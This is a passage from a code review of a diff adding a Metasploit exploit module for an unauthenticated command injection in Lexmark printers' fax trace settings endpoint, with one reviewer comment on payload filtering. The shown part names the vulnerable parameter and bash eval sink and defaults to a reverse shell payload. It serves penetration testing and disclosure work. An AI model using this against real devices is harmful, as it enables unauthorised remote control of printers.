modules/exploits/linux/http/lexmark_faxtrace_settings.rb

```diff
@@ -0,0 +1,115 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Retry
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Lexmark Device Embedded Web Server RCE',
+        'Description' => %q{
+          A unauthenticated Remote Code Execution vulnerability exists in the embedded webserver in certain Lexmark devices through 2023-02-19.
+          The vulnerability is only exposed if, when setting up the printer or device, the user selects "Set up Later" when asked
+          if they would like to add an Admin user. If no Admin user is created the endpoint `/cgi-bin/fax_change_faxtrace_settings`
+          is accessible without authentication. The endpoint allows the user to configure a number of different fax settings.
+
+          A number of the configurable parameters on the page (ex. `FT_Custom_lbtrace`) fail to be sanitized properly before being
+          used in an bash eval statement: `eval "$cmd" > /dev/null`, allowing for an unauthenticated user to run arbitrary commands.
+        },
+        'Author' => [
+          'James Horseman', # Analysis & PoC
+          'Zach Hanley',    # Analysis & PoC
+          'jheysel-r7'      # Msf module
+        ],
+        'References' => [
+          [ 'URL', 'https://github.com/horizon3ai/CVE-2023-26067'],
+          [ 'URL', 'https://publications.lexmark.com/publications/security-alerts/CVE-2023-26068.pdf'],
+          [ 'URL', 'https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/'],
+          [ 'CVE', '2023-26068']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix'],
+        'Privileged' => false,
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Unix (In-Memory)',
+            {
+              'Platform' => ['unix'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_socat_tcp'
+              }
+            }
```

Comment:
I think there's a `RequiredCmd` key or something similar that you can use to filter out payloads that you know will work with the embedded device.